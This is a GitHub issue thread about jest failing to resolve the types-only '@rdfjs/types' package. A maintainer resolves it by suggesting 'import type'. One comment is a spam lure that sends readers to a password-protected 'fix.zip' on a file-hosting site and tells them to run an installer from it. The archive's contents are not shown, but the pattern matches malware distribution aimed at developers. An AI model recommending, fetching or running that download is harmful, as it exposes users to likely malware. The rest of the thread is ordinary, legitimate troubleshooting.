### ISSUE TITLE
Error importing rdfjs with jest

### ISSUE THREAD

**Issue by MMesch** [rdfjs/types#43]
I'm running into a problem using rdfjs types together with the jest testing framework. The jest resolver can't find "@rdfjs/types" when it's imported in some library. When I edit the `@rdfjs/types/package.json`  file adding `"main" : "index.d.ts"`, it can then find the package but it throws an error when importing the relative imports within that package.

_Disclaimer: I'm not super experienced with typescript._

The error I am running into is:

```
➜ npm test

> minimal-rdfjs-jest@1.0.0 test
> node --experimental-vm-modules node_modules/jest/bin/jest.js

 FAIL  src/index.test.ts
  ● Test suite failed to run

    Cannot find module '@rdfjs/types' from 'src/index.ts'

      at Resolver._throwModNotFoundError (node_modules/jest-resolve/build/resolver.js:427:11)
```

I uploaded a minimal example to reproduce here: https://github.com/MMesch/minimal-rdfjs-jest

Any ideas what could cause this and how to fix or workaround?

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MMesch** [comment]
Importing other packages seems to work fine (I added `chalk` in the example to demonstrate).

**Comment by tpluscode** [comment]
No code exists in the package `@rdfjs/types`. Try type-only import

```ts
import type * as rdfjs from '@rdfjs/types';
```

**Comment by MMesch** [comment]
Great that works! Thank you very much for the quick help.

I exchanged: `import {type Quad, type ResultStream} from '@rdfjs/types';` with import type {Quad, ResultStream} from '@rdfjs/types';` and that did the trick.

I was extra confused because building, the language server and everything else worked well otherwise. Only jest bugged.
